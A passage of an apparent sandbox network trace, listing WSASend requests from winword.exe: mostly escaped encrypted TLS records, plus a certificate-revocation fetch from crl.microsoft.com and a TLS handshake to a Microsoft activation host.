579. "http_request": "winword.exe_WSASend_\\xc4\\x00u\\x00pzr\\x10'o$\\xc2f\\x84tb\r\\xdc^ 4\\xb6\\x19\\xce\\xa8u\\xcf\\xb2-\\x86\\x07\\x84\\xa8\\x83\\xdb\\x13\\xfc\\x7f\\xa3\\xe4\\xd3\\xe5\\x8c,\\x0cs\\xa1\\xcf\\xc9/\\x9a\\xdal\\xa4\\xc5e\\x932\\xa7\\x16\\x93\\xd5\\x11\\x1f\\x01\\xf9\\xfe2\\x0e\\xba8\\xeb=\\x1ccb\\x84\\xe4\\xa7\\xbct\\xf2\\xc6\\xaf9\\x12j3p\\x92a\\x801q\\xb3\\x1ek-\\x8f\\xa7\\x96z\\xfd\\xf9\\xc3\\xfc\\xc4s*f\\x86\\xa09/\\xf7\\x9a\\x86\\x8b\\x8c\\x11n\\xc3;\\xd9\\xdd\\xf2\\x80\\xd0\\x81\\xf9\\xf6\\xb0\\x18\\xd9\\xf3\\x85\\xf1\\x08\\xdbp&x:4\\xb2?v\\xb6&eq\\xcb\\x14\\x91i|@\\x81\\x93\\xfe\\xa8kn0\\x01?0\\x02\\x89'\\xe0\\xb5\\xac\\xa7\\x1f\\x95*\t\\xe3\\xf5\\xe9\\x95 \\xf0c\\xce\\xc6\\x93\\x80\\xf5\\xdb1so~:\\xc5u\\x8d~xr\\xf0\\xc1\\x1c>\\xa3\\xd1\\x9e\\x86\\xb1v\\xda\\x15\\x170\\x04\\xdc\\xec*\\xd8\\x044\\x9c\\xa6\\x9c\\xab\\x16w\\xc9\\x98g`f\\xb5#\\x19\\xeb.f\\xe8o\\xcb\\x90bd\\xd9\\xa4&~\\x95\\x95\\xf7"
580.  
581.  
582. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010rv\\x8cv\\xf3\\x1b\\xa6\\xe4-\\xa0\\xbazf\\x9d3\\x12m\\xb9oqe\\xe6\\xec\\x83\\xc3\\xb4\\x8a\\xb2@0\\xd3r\\x1d\\&n=\\x85-\\xdf\\x1by.?\\xf6\\xaa\\x9d^\"\\xd5\\x06\\xd7i\\xdd\\x06\\xcf\\x17\\xd3%8\\xc1\\x97\\xc9w~d\\x1e#e\\x80\\x15\\\\xe0o\\xbc\\x84e_\\x7f\\x96\\x95\\xb9\\xe2\\x8a\\xef\\x99f2er\\x10\\x85x\\xebhw\\x97\\xe0\\xcbg\\xb6x\\xf2a\\x8a\\xfd'\\xf1x5a\\x9f\\xf9\\xbf\\x9b\\xd7;j\\x07\\xb8x\\xf4\\xaa4\\xc2\\xe9\\xf1a\\xbc4\\xec\\x8a\\x8c\\x7f\\x03\\x96%qx~\\xaa\\xd9\\xa9u\\xae\\xd2\\xfa\\xf9\\xf3uf/\\xad.v\\xe1\\x9b\\xb5\\xa9\\xbc\\x1anr\\xcb\\xc2\\x00\\xaf\\xcb\\xa0\\xdd\\x9e\\x0e\\x9c\\x01\\x9e_g\\xd6m\\xec\\xf6\\x08\\x9b\nr\\xecp!xln\\xa7su\\x85\\xd4\\x1c\\x96alz\\x8e\\xc0\\x05\\x13\\xb0\\xb0>\\x19\\xc5\\xf0i\\xfc1\\x1a~\\xc8\\xe6\\xb1\\x93\\x1e>\\xe2\\xb4\\xbd#\\xc0s\\x97\\xae2)=\\xbe\\x8c\\xc1y?\\xab\\xf3gl\\xeb\\x01\\xcfk"
583.  
584.  
585. "http_request": "winword.exe_WSASend_get /pki/crl/products/microsoftrootcert.crl http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: thu, 07 mar 2019 06:00:16 gmt\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: crl.microsoft.com\r\n\r\n"
586.  
587.  
588. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01x\\xeea\\xdc\\xbf\\x9fy\\xf4(_r\\x8d\\x9a\\x9aw\\xad\\xa0\\xcc\\xb5\\xa3\\x8fv\\x1a\\xb9i\\x81u\\xba\\xab\\x15\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1cactivation.sls.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
589.  
590.  
591. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd8\\x1d\\xad\\xfa*\\x96?\\x81\\x03\\xde\\xb0\\x16\\x10\\xdbq\\x7f0\\xf7\\x10\\x90\\xdc\\x8a\\x99\\xaa\\xcah\\xe0-\\xbbj\\xc6u\\xf1\\xd8\\x9c\\x06\\x96e\\x84z\\xde\\xe8k\\x9fu\\xf4\\x92l\\xc1wz\\xd2\\x9f5\\xdc\\xcc\\xe6\\xff:\\xa7r\\xab|\\xcf+u\\x85\\xbc\\xb0(\"rj\\xb5\\xb0\\x82\\x1f\\x04h\\x04\nd\\x88\\x87\\x97\\xd1\\x97;\\x93\\zj\\xf6\\x99(y\\x84\\xc1\\xcc\\xf2\\x94?\\xcf\\xbc\\xe5\\xcd|u<*\\x8c\\x04\\x074d\\x83m\\xde;j\\xdf\\?\\x84u\\xc4\\x1b\\xd5\\xd2\\xa7=x\\x18\\\\xef\\xe3a~&\\x8f\\xa8\\xbfeo\\x90r=\\xe2y\\xab\\xcfun\\xe5\\xbch\\xa3\\xc8\\x9at\\xd3\\x9f\\xd4,\\xcb+\\xea3\\xca^y\\xa1k\\x12\\xdbke$\\x0f\\xc3\\x91\\x81\\xec\\xb8\\x8anb\\x02\\xf9:\\xdeh\\x96\\x18\\x07x\\x8c\\xa2\\x9f\\x85j\n\\x99\\xa2?\\x92\\xef\\xfd_\\xb0\\x8c\\xe5\\xbf\\xb7e\\xa0\\xdf\tc^o\\xf80uf\\x1b\\xb6\\xe0\\x16\\xd9\\xf9fh*\\xde\\x9c\\x17_\tk\\x9f\\x9b\\xc9\\xaej\\xf2\\xdd\\xdf"
592.  
593.  
594. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010(!\\xdd-\\xb6b(\\x8c\\xf0\\xfc\\xda!\\xffb\\x82\\x8f\\x0e\\xb5\\xd4\\xa2w\\xa2'\\x03\\x1e\\xec1u\\x82\\x91\\xea\\xc5u7/\\xc7\\x9f9_g&\\xd2\\x0epp\\x8d\\x9c\\x81\\xdf\t\\x1b\\x94\\x19h&\\x1a\\x9dv\\x0c\\x9b\\xa7pl\\xcd\\xc8\\xca\\x8ew\\x81\\xd9\\xb4\\xec\\xf2\\x988\\xe5l\\xb6u\\xc4\\x02\\xc3\\x9f\\xf5\\xf7\\xd8\\xb7q\\xb7\\xc4t\\xa8\\x1b\\xf7\\x04\\xa5\\xab\\x99n\\xea\\xc6\\x86e\\xb4\\xc5\\x80\\xef@\\xca\\x0ey\\xc0\\xc9\\xf0\\xd7\\x9dtr\\x9b;\\xbe\\xa2\\xd6\\xf9\\xcf\\x1e\\x9c7\\xc9@\\xc6\\x19\\xa7\\xf5d75g:\\xf2a5\n\\xfa\\xa2\\x04\\xaf\\xc9\\x87j\\xdd\\xe1\\xfe\\xc9\\xa9@\\xba\\x15\\xc6\\x8f9\\x95\\xd5\\xa97tz\\x9fp\\xc3-\\xa5\\xf1\\xff?\\xde:q\\xf6(\\xf2\\xc1\\x05ls\\xeb\\xc8p\\x19olh2\\x88\\xc6\\xce\\xc4p\\xf5\\x9a$\\x81s\\x80\\x86\\x86\\xc7_\\x00\\xd8\\xf0q\\x9c\\xf7\\x08\\xa8\\x00k\\xa5\\x17\\xc2\\x01\\x15\\xb9\\x96rv\\xf2\\xea\\xd7\\xe3\\xb4\\xe3\\x1e\\xd8\\xc0u5\\xef\\x97\\x80s\\xe5g`l\t\\x0b"
595.  
596.  
597. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010p\"\\xdb\\xb9\\xec\\x02*s\\xc2\\xb6\\x91\\x96\\xc5/5b6)v#\\xa5\\xb8\\x92\\xa0ub\\xfa:s\\x17q\\xcf\\xb4.d\\x97\\xd8\\x8f\\xa4-\\xd0\\x8f\\x02\\x8c\\x8f\\x1b\\xf9\\xe4b\\xfa\\x12m\\x10\\x86x0_~\\xf8\\x11\\xca4\\x00\\xd5\\xf5s(z$l\\x95z\\x88\\x9c=\\xb8\\xcc\\x05\\xdbd\\xf2c\\xa6&s\\xe4\np\\x0bw\\x9f\\x01\\xd6\\xbe\\xf8(h\\x84m\\xa4)\"e\\xed\\xe43_\\xd1v\\xc8\\xca\\xb5\\xe2\\xc6\\xd0\\x9c\\x99zy\\xa6\\x1e\\xc4\\xca\\xe1&\\x1c\\xd6:-x\\x14\\x97\\xae\\xe07\\x88f\\xb7i8\\xb3qb\\x87\\xa1\\xe2\\x15v_\\x03\\x9b\\x99\\xee\\xd0\\xd1/\\x1a\\x80\\xcf\\xcbze\\x1e\\x89\\xbd5\\xd0j\\xee\\x1c\\xa8\\xf1,\\xafafc\\xf3\\xa2\\xf7\\x1ao\\xbf\\xcb\\x80\\xeb)\\x9b+\\xf0\\xb7 \\x81x\\x0f0\\x93\\x82k\\x80\\xed1n\\xc5\\x83\\x12\\x18y\\xb0\\xe7\\xc8y\\xbfs\\x0cx.\\xd2\\x11\n\\xcdi\\x8c\\x0f==i\\xe8v\\xcfu\\xb6\\xa0\\x1bc\\xe2\\x9bby'\\x7f_\\xb1\\xb6\\x00\\xf0.\\x16"
598.  
599.  
600. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109\\xb0\\xae\\xfe\\xf2\\x95u#\\xfa\\xd0\t=\\x8b\\x9f\\xb0\t\\xd9\\xbe\\xe9o$8\\xc6\\x82\\x9f\\x8dv\\xf50\\xacc\\x05\\xde\\xd26 p\"\\x94\\xb7_\\xad\\xda\\x0eq\\xc5\\x94\\xeb\\x1f\\xba\\xe4\\x02\\xe8\\x03\\xd1g\\x12\\xd0\\xac\\x9a\\x9b\\xa15\\x9e\\xc7\\xc0\\xc2\\xc2\\xc7\\xb4e\\xb9\\xfc\\x0e\\x93\\xc5\\x95\\x9b\\xbf4.\\x1c\\x93\\x92\\xa3^7\\xf0\\xb8\\x06=l\\xa7\\x07i\\xfe\\x01\\x80\\xb9f\\xda\\x9a\\xc8=w\\x8a\\xf8\\xd1\r7\\x11=qt\\x88\\xf4,\\xday\\xe5\\xb5\\xdc\"\\xe8\\xb6\\x7f\\xb7\\x04ut\\xfd\\x83m|\\x99#\\xe6exwb\\xe8\\xcb\"\\xe2\\xf6\\x8d\\xb2\\x18x\\xf9\\xba~o\\x8e\\x04v\\x81\\xb6\\xb6\\xbd\\xd5\\xd2a\\xae3\\xd3\\x8ap\\x80'\\x91\\x16\\xacl-\\x86jo^r\\xa6\\xee\\xb7\\xdf\\x88\\x17\\xc5<g\\xe5y\\xc8\\x8f\\x9b\\xc3\\xa1+\\x19\\xdfj\\xfb\\xb9\\xb1\\xfa\\xc4\\x9co!\\xf1\\xf6\\xdb:g\\xc2\\xa5\\xe0\\xea\\xf5\\xb6\\xf9\\xd4j>\\xa0v\\x0e)l\\x9a@\\xd5p\\xf1kzx8\\xffnxc\\xa4q\\x1c/g"
601.  
602.  
603. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xea\\xeeg\\x1d\\xba\\xfc\\x8c.q\\x8bvk\\xaa\\xe4-\\xda-\\x1d\\x1f\\xab\\xb0\\xcc\\xff@\\xd6\\x91\\xd7\\x89\\@\\xd0\\x13\\xac\\xee\\xb5>\\x84\\xb5\\x15\\xc5ql;a\\x07'\\x0cg\\xbc\\xc9\\xebh\\xb7<\\xf3\\xcb^\\xa1\\xaat\\x85\\xdd\\x8dc\\xcb\\xf2f\\xc5\\x18\\xa8\\xb9\\xf9\\xef\\xad\\xeb\\xda\\x18:j\\xab\\x1e?\\xd3\\xa95l\\xdbd\\xd6\\xb3ja\\xeauobh\\xc7\\xbb\\xf9^v\\x1f\\xf8\\x07\\x80\\xce;:\\xe9r)\\xb4f0\\xd9\\xb2\\x8e\\xb8a\\xbd\\x9e\\x8ct\\x0f\\xc8!`\\x87\\xc2\\xe5\\x84p\\xf9\\xcfg@\\x80\\x0cfg\\x7f\\x00\\xc2\\xbb\\xf5\\xf1\\xf6\\x02\\xc6\\x94*\\xe9\\x12oy\\xe8\\x157\\xaa%5\\x1a\\xca\\xcen\\x97b>\\x8a\\xdc\\xccf^\\x90\\x95\\x17\\xa8\\x1d\\xf1'\\xff\\xc9\\xb5\\xb4\n\\xba)m\\xf4\\xc9\\xd5\\x0ef0\\xc1\\xcd\\xf7\\xdc2\r\\x9f\\xb1/aeeu<7\\xdb\\x88\\x1amp^?u\\x0c\\x96_l\\xe6\\xe4u\\xb5\\xbf\\xcd\\x01\\x1di\\x959(u\\x19\\xdb;x\\xb5!m\\xe8\\xf6\\xce'\\x0e\\xa8"
604.  
605.  
606. "http_request": "winword.exe_WSASend_\\xea\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04z\\x8cvwo\\xb2v#w\\x12\\xdb\\xb4\\xe0/\\x0c\\x9731\\xa0\\xf6,z\\x8b\\x86.d\n\\x88\\x04\\xdb\\xc4\\x8d\\x99\\x7fb\\xe5^\\x7f\\xf6\\xb2l\\x85\\x19 \\xb3pa`\\x83\\xcf\\x8e\\xe1\\xb5\\xa2\\xa7x\\xb4\\x11\\xfct\\xd9\\x0ej\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe9\\x99\\xd1\\xef\\xd8\\x11\\xcc\\xb9\\x1bd\\xbe\\x0b\\xbd\\x85*\\xb00\\xb5\\x9a*.\\x08\\xe4\\x14*\\x95g+#m\\xfdtx\\xbd\\xd0\\xdbn*\\xdeyh\\xaf\\xa8\\x90\\xc6^\\xd0"
607.  
608.  
609. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109\\xd5\\xa8\\x0c\\xa8m\\x1d$xp<\\xd58\\x94s(\\x92q/\\x98\\xe0t\\x980\\x04|\\xfe\\x90.,t\\x9a\\xee9,\\xa3\\xd3\\xb6n\\x07\\xc8\\xbb\\xcfm\\xc2\\xd8\\xc4\\x89'\\xda2\\x91;\\xd66awy\t\\x84\\x8bv\\xd72\\xabx\\xearb\\xd2\\xe5z|\\xe9\\xb3\\xdb\\x8bg\\xc4qx2\\xb4c\\xc9\\xfa\\xe7\\x10\\x9f\\x83\\x1b\\x8a7h\\x91\\x0c\\xf5z\\x1b\\x98\\x01wu\\xa4\\x87.\\x17\\x02\\xce\\xf7\\xc8\\xb6)8\r_\\x82\\xedy\\x83\\xbf\\xcc\\x00\\xa5\\x11`\\xc2\\x02\\x7f\\x81\\x05w\\x19m\\xa3\\xe0\\\\x07\\x00\\x04\\xebpb\\xa4-p7\\xff\\xb4=\\xa1\\x97\\x89:\\x93\\x06\\xaf\\xff\\xd6\\xc4\\x8c\\xe3\\xf7p\\xee\\x8fe\\x81\\x83v\\xd5\\xa7\\x89\\x04\\xe2oh\\x11\\xc6wiqt:\\xe5\\x1f\\xaf\\xd1\\x9fke\\x8d\\xd8\\xb3'z\\xc0\\xf0\\xa1\\xb0gu\\x9cj\\x14gc@\\xd1\\x8a\\x95\\x1f(\\xebc#\\x955\\xa8\\xc3\\x9c\\xeb\\x84\\xa3%\\xb7\\xa3\\x0b\\xd8\\xe2\\xaa\\xb5_\\xebq\\x95\\xd4\\xd0\\xeecc\\x9e4\\xd0lz\\xee\\x1d\\x9f\\xad"
610.  
611.  
612. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x12f\\xd2b\\xdf\\x8dt\\x92\\xd90(\\x12\\x8d\\xc1\\xe0`\\xd8\\x97\\x1b\\x14'hwn\\xc5\\x10q\\xb2\\xe7g\\xe2q\\x1a\\x8b\\xd2\\x86\\x9f36c\\x07\\xef\\xeer*\\xban3p(^pq\\xba\\xe6\\x9dznu\\xbdr\\xed\\x8diy\\xa8\\xe8\\x9dxsl\\xbf\\xf0\\x0c\\x94\\x1b\\xcfh\\xe9\\x92\\xc7\\xf6:\\xa1\\xd4\\xb5\\x19u9j\\xff\\x1ee\\x80j\\x19p\\xf60\\x90\\xa1n&\\x97\\xce\\x1b\\x91v\\xe8\\x13\\xf0,\"\\x19\\x1dq\\x8f\\xdf\\x16\\xe2\\xd4\\xce\\xa6\\xa1k\\xd8\\xe8\\xc8\\xc5\\xfc\\x10\\x91\\xfe\\xef\"\\x18\\x8a\\x93\\xcf\\xab-\\xe19f\\x01e\\xaa\\xdb\\xc0\\xf9\\xb6>\\xa4$h\\x96y\\xee\\xc9\\xf9\\x1c\\xc6k'\\x98\t\\xac'\r=\\x88\\xe8\\x9e\\xf4\\x1a|\\x1d\\xa1m\\xab\\xd9\n\\x02b>\\xdc\\xc4\\x04n\\x91q\\x9e~\\xad\\x1fni\\xfd\\x13b\\x85~\\xcd\\xbd\\xe9\\x17\\xddtt!\\xa1c\\x82\\xcf\\xb4\\xb7e\\x91\\x0e\\xefg\\xc2\\x1c\\x9di\\xdbv\\xa7\\x87a\\xaf\\x88\\xed\\x97&\\x06k#+\\xaf;u\\xfd\\xb3_#b"
613.  
614.  
615. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd6u\\x06o\\xb7\\xf87\\x7f\\x83-\\xe4\\xac)q\\x0c)\\xd6\\x95\\xc0\\x18h\\xf8\\xe5>l\\x89\\xaa\\x18\\x8c\\xad\\x81?a\\xcd71\\xf0\\x89\\xd70\\xa1<vh\\xee\\x9d\\xd7\\xd3\\xbf\\xf7*\\x0c\\x8e\\xf4\\x9ancr\\x11o'q\\x8b\\xa8\\xcbi3\\x11p\\xff\\x89\\xca\\xc8\\x8c\\xe4\\xfe\\xc0\\xcd^\\x1dt\\xf8\\xed\\xbb4p\\xeas\\xbc\\x00g\\xd4\\xf3\\xe9\\x93\\x8d\\x13\\xc5w\\x93\\xa7\\x1b\\xc0\\xc9\\xac\\x00\\x85\\x1de\\xde\\xfb\\x01\\x0c\\x16-\\xb9\\x10kx\\xe7.\\xbc\\x03pa\\xe5\\xd9\\x04\\x13\\xd0x`\\xf8\\xd1\\x9e\\x1e\\x82\\x87<z\\xa9\\xc4\\x10rj\\x12\\xf2\\x95\\xb2g\\xc9aavw\\x98\\xefa,\\xbc_\\x18\\f\\xeaa\\xf1b\\xa3\\xcc\\xed\\xa6>%8\\xc6w\\x1cau\\x93\\xfc\\xcc\\xe8v\\x13\r\\xb4\\x8d\\xe8\\x00ik;\\xe6\\x04\\xc1b\\xafo\\xfab\\xf9\\x0f\\x9a\\x80\\xd1\\xdeq*\\xe2\\xc7\\xf4\\x9fg`\\xbb\\xda\\xd9\\xe4@\\x8ayh\\x03u\\x94v5u\\xb3\\x905\\xee\\x9d\\xde\\xaf\\x85\"/\\xedq\\xd7bw\\x1f\\x19q"
616.  
617.  
618. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010m\"\\x8c\\xff\\x061\\x06z\\xaf4|r2u\\xe2\\xb4\\x1ai\\x8a\\xbf5&,s\\x7f;y\\xcfaf\\xf3\\xbaf8\\xc0\\x84\\x10\\xe1a\\x1e\\xdaj\\xa4\\x9e\\x84\\x87\\xf0\\xdf\\x81\\x91\\x0f\\x8f\\xc5f\\xa0\\xd9\\x8e\\x1e\\xfb\\x16\\xc2\\xc9\\xafv\\x8b\\xec=\\x97\\xa6=v\\xbf\\x86\\xba\\x9e\\xcd(\\xd7\\x93*\\x07\\x15t\\x01\\xc2b\\xf7\\x96\\xa5\\xa4,\\xe8x\\x0f\\x18\\xd5\\xbd?\n\\xb3#c -\\x06\\x00dc\\xf1o+\\xb0=$\\xd3\\xe9\\xb9\\x1e\\xfah1\\xdf\\xfe\\xd5-a/la\\x02z\\xcd\\xebk9\\xa0\\x19-\\x95x\\x1adc\\xa9xi\\x90\\xa0\\xd9\\xa3\\xae\\x0f\\xf2\\xd1cz\\xd1\\x8e\\xca\\x04\\xbd~\\x94\\xdb\\x87\\xcb\\xd2\\x1eu'\\xdc\\x03\\xbd\\xe5\\xeb \\xa7y\\xcc\\xc0h\\x8f\\x94\\xc3\\xd1+\\xadx\\x06\\xbeal|\\xd85\\x93\\x0e3\\xe1@\\xf6\\xff\\x87\\x82\\xbe\\x83\\xb4\\xf1\\x93f#\\xb7)!\\x1d$iiy\\xbf\\xe1\\xf7\\xe4\\xcei(\\xe1\\xe0\\xd9\\x00u\\xfe\\xd1\\x81##\\x1d\\xed\\xf9p\\xc2\\xa7\\xbfq.h\\xde\\x94"
619.  
620.  
621. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x96\\xbfe\\xe78\\x8f\\xc2 i\\x83i\\x93x\\xf5\\x0b\\xf4\\xa1$z\\x01\\xe5=\n\\xf4\\xc6\\xeb\\xad=\\x1bm0\\x88\\xa0\\xec\\xb0q.\\xaa\\x06\\x81\\x10)\\x83\\xa5bci%\\xae\\xc9.\\xc5\\xef\\x86\\xd4\\xdaj\\x14i:#\\x97=\\x96\\xc4\\x91\\x91\\xed\\x0b\\x17\\xd7 \\xf7r\\x81\\x9a0\\xb7\\x92e\\xd4;\\xae\\x84\\xbd\\x9c\\x02@\\x8a\\xf8n\\x8cjv\\xca\\x1c3\\xbc \\xc8\\xb1\\xfb\\\\x07n-\\xf3\\x14\\xacm\\x80gw\\x06\\x94\\xcf\\xd5\\xf6\\xa6\\x98m\\x1c\\xb3\\xe7 `\\xd0\\xee\\xf4\\xea\\xaas\\x01|\\xd7\\xb5\\'\\xefv<\\xd2$\"\\xfa\\xd0g\\xbd\\xe2d\\x909<p\\x03\r\\xff\\x84a\\x1c\\xa1\\xe6\\x1d\\xf2\\xc9\\xf7wm^\\xb7\\xc9\\xc6~z\\x94\\xa0 \\xd4\\xa7\\x03\\xc4\\x98n\\xe5\\xd5\\x1d.i)\\xf2;|\\x00\\xec\\xa9\\xe4h)\\xff\\x95\\xa6\\xdf\\xef\\xba\\xf1\\x8f\\xc1\\xece\\x1e(\\x80\\xc7\\xbc\\x17\\x82\\x80\\x9d\\x0b>\\x04g\\x17\\x02\\x87\\xd3=n\\x88j\\xcc\\xcc\\xe6\\x06\\x91gp\\xe1g\\xa4\n\\x976\\x04\\xddt\\x90\\xa9v\\x8d"
622.  
623.  
624. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xca\\xcf\\x12\\xc7\\xddkcd\\x06\\x82\\xd5\\x943if|\\x9c\\x888\\x98\\x83\\xb4\\xc2\\xd5\\xca:m5\\xfaki\\x05\\xaf\\xe6\\x83^:\\x1b,\\x7f0j\\x05\\x0ex'\\x8bf\\xe5\\xdf\\xea2\\xc1\\xf5\\x17\\xb4\\xb5\\xf1\\xb0ud_e\\x0f\\xa7\\x9b\\xda\\xda\\x88\\xf4e\\xb8\\xc8\\xd5\\xde>n\\xcf^b\\x9e5\\xfd;\\xdf\\x16ps\\x1e\\xbe\\xb7\\x1a5\\xf2rkj\\xa8v\\xc1l\\xa0^g)\\xa3\\xd9\\x9e\\x17\\x11e9\\x00\\x86\\x06\\xcf\\xec\\x13,\\x8b\\xf5\\xa3\\x1fw2\\xcf\\xf2\\x8fe,\\x16\\x8e\\xac\\xd9bj\\xa5\\xaf\\xba\\xc3kw\\xa9\\xd7\\xcb\\xdc\\xc7sr\\xaf\\xe6\\xe6\\x87\\xf6\\x8d\\xd7\\xc9\\xcf7\\xae-\\x9261\\x9f\\x01\\\\xc2\\xd1c9k(\\x07\\xe7\\xe9\\xbe\\x9c\\x03\\xfc\\xc7u\\xe8>\\x91\\xa9\\x07\\xa9\\x92\\xfb\\xc1\\xd0b.9\\xc2\\x9a\\xf98\\xe9\\xaa\\xe3\\x90\\x10ehg\\x86\\x8b\\xa9\\x12z\\xbe\\xfb|h\\xb5\\xc1\\x01j\\xd1\\x9a\\xcb\\xe2m\\xb5\\xadn&\\x1a$i#\\xff\\x1a\\xad\\xdf/\\xf0\\\\xe7\\xf8\"!\\x83\\x8f\\x8fo"
625.  
626.  
627. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xfd9e\\xa2.x\\xbb\\xe1\\x8br\\x960\\xb1\\xd5\\\\xb8 h\\x9e\\xd7vda9=-\\x8f\\xa7\\xbb\\xc5;\\xf8\\xaa\\xbf\\\\xa9\\xc1r\\xb1wb\\xf0w\\x9f\\x1eb\\xdcy\\xd3w\\x91\\xff\\xe6;\\xb3b\\x89\\x8b\\x1adqg\\xc9\\x93q\\xa3\\xf3u\\*\\xfc\\x8d\\x8f\\xba\\x00\\xe2wm\\x15\\xfa&\\x01s\\x9e<\\xcft\\x9f\\xb2\\xf5yq*aw\\x8ek\\xbf\\xa7\\xffj\\xc0i\\x08bn\\x95\\xc3\\x1e\\xcf\\xc2v\\x8f\\xbf\\x01`\\xca\\xf7\\x9f\\x0f\\xecn\\x1d~|\\xfc\\x05\\x11\\x12\\xbc\\xb5p\\x93i\\xacd+\\xd3\\xdc=\\x99\\xd0(\\xf1dqj\\x9c(\\xad\\x82\\xb1\\xaaa<i\\xdd\\x06\\xe1\\x0f\\x8f\\x14\\xb2\\xac\\x04\\xd9\\xc8\\xfe\\xd1w\\xf5u\\\\\\xac\\xde\\xafsg\\x04\\xa7:uc\\xc5\\xc6\\x80\\xdb\\xb2?~\\xb3l\\xc9\\xd4\\xe1)\\x1a\"\\x99\\xe7+\\xdb\\x12\\xa3\\xca/\\xe0\\xa6\\xcb\\xbd\\xcb\\xaf\\x8d\\x90>h\\xab#\\x89wp\\x9e\\xa0\\xa1+^\\x97\\x1f>\\xe0`\\x8b\\xd8\\xfctv\\xed\\x08\\xcbw\\xa4\\x9eo\\x08\\xc8-\\x85"
628.  
629.  
630. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1b\\x02\\x00r\\x84\\xb3\\xe0c~^\\x9drz9=f-\\xa9\\xb4\\xf7;~as\\x90\\x11f\\xa7>\\x1b\\x96\\x08:\\xb1\\xd3`e\\x07\\x96h\\xe4g\\xfb\\xb2\\x7fce\\xa3\\x0e\\xfd\\x9d\\xc7\\xd0\\x1f\\xa0b\\x07\\x9e\\x1d\\xfd\\xa5\\xe2\n\\xe5\\x94yb\\x8brl\\x15s\\x046w\\xd3\\x80\\xb87\\x11\\xe0\\xfc\\x18wt\\xa78\\x96\\x03\\x86\\xc7x\\x82?\\x1c\\xe59\\xe29\\x8b\\x05>e\\x12\\xbf\"%\\xf1\\x83\\x80*b\\x04id\\x04\\xc8h\\x8f\\x01;p\\xad|*\\xd4h\\x10(\\x19gj\\xb8lzry\\xf0\n~n)\\xefv\\xc4\\xab\\x86l\\x03\\x8b\\x8b\\xef\\xf9\\xc6\\x00\\xf6|\\xcf\\x1c,\\xb7+\\x88\\xcf\\xcd\\x18\\x14'\\x9e\\xf3\\xaa\\xae\th\\xef\\xfe\\x98\\xdc\\x022\\x1b\\xe9\\xe3\\x81\\xaf\\xdc\\x14\\xa5e\\x11\\xa2\\x07v\\xa8\\x1e\\xbe\\x938n~\\xa4\\x1e\\x03\\x1a8\\xd8\\xc3\\x9bb\\xe4\\x18\\xfe\\x8ej\\x14+\\x84\\xe6\\x9f<\\x9a.\\xb0q\\xdf\\x0b?\\x9c\\xf9\\xf0\\x07y\\x8b\\x19\\x99|\\xc2\\x122\\xb8\\x08\\xb4\\xd9\\x04\\xd9\\x9dq6"
631.  
632.  
633. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010l\\xe4\\xa6\\xc7\\xce\\xfc2<\\x05\\xdd<n\\xbb\\x86t\\x81\\x95\\xea\\xb7\\x9c\\xe0\\x077d\\xf0\\xf2`\\xaeq\\x9b'\\x99\\x15\\xda\\x94\\x90\\xd1o\\x9a\\xcd\\x08i\\x1f\n o\\x1b\\xe3\\xe0w\\xe0i\\xdc=/\\x869\\x07d\\xd0=\\x1f\\x0f\\x0c\\xb1*\\xc0\\xbf\\xb13t\\x02_\t\\\\x98#\\xc9\\x9a\\x87\\xf0\\x1e1)!\\xfb\\xcb\\x0f\\x07y<\\xa5\\xbcc\\x07\\x15ycj\\xbe\\xb0\\xe3q\\x80e\\x85\r\\xf9\\x12\\xf9u\\xf2\\x10\\xeb\\x80\\xc2\\xab\\xe76\\x90\\xc5\\xabb\\xabsx\\xf4\\xa3(\\x82\\xfc\\xc3\\xdf\\x95\\xcf\\x04\\x14h\\x8c\\xfact\\x14%g\\x91@\\x94\\xc7\\xe8|\\x94\\x84\ta\\xec#m\\xbdq\\xcb\\xfc\\xffesx!\\xf4q\\xaeh\\xb9\\xe5t3o5\\x9a\\x99\\xc8k\\xd0\\xca\\xcc\\xab\\xeb#\\x89\\x94\\xbf\\xf8^\\xaa\\xe5oo~\\xad\\x1c.\\xee\\x9a\\xe3\\x98ims\\x0br\\x97t\\xa5\\xc3\\xa7\\xd6z\\x94\\xcd\\x81\\x8az\\x1b\\x00\\xc18\\x8a\\x8fs\\xcf\\x84\\xd1\\xf1\\xdf\\xc3\\xad\\x9f\\x00\\xfbwt\\xbe\\x81\\xa3"
634.  
635.  
